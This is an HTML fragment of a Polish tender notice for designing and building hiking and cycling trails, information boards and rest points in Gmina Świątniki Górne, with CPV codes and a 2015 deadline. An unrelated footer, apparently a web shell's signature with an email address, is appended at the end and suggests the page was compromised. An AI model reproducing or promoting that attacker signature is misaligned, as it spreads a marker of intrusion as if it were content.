<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem Części nr 4 zamówienia realizowanego w formule zaprojektuj i wybuduj  jest przygotowanie materiałów wyjściowych do projektowania, wykonanie projektów wielobranżowego sieci szlaków pieszo - rowerowych, wraz z punktami informacyjno - wypoczynkowymi, oraz realizacja Części nr 4 - Gmina Świątniki Górne.
Ta część zamówienia obejmuje:
A/ częściowo Trasa nr 7: Świątniki Górne - Konary - Włosań - Olszowice - Świątniki Górne, zgodnie z opisem w załączniku 9.4 do SIWZ: realizacja Centrum Informacyjnego Szlaków w Świątnikach Górnych, wykonanie tablic informacyjnych, wykonanie miejsca wypoczynkowego w Olszowicach 
B/Trasa nr 8: Świątniki Górne - Łyczański Las - Podstolice - Ochojno - Świątniki Górne: wykonanie tablic informacyjnych, wykonanie punktu wypoczynkowego w Rzeszotarach  
C/ Trasa nr 9: Podstolice: wykonanie tablic informacyjnych
Szczegółowy opis prac zawiera SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.62-2, 45.23.31.61-5, 45.11.12.00-0, 45.23.24.52-5, 45.11.12.91-4, 73.20.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com